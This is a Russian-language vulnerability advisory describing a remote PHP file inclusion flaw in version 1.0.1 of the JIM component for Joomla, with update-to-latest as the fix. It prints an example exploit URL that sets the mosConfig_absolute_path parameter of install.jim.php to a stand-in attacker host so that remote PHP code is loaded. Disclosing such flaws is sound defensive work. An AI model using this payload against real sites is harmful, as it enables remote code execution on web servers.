PHP-инклюдинг в Joomla JIM

Дата публикации:
21.08.2006
Дата изменения:
24.03.2009
Всего просмотров:
3558
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
JIM 1.x (компонент к Joomla)
Уязвимые версии: JIM (компонент Joomla) 1.0.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_jim/install.jim.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://victim/[path]/administrator/components/com_jim/install.
jim.php?mosConfig_absolute_path=http://evil_script?

URL производителя: extensions.joomla.org/component…Itemid,35/

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: Joomla com_jim Component <= 1.0.1 Remote File Include Vulnerability

или введите имя

CAPTCHA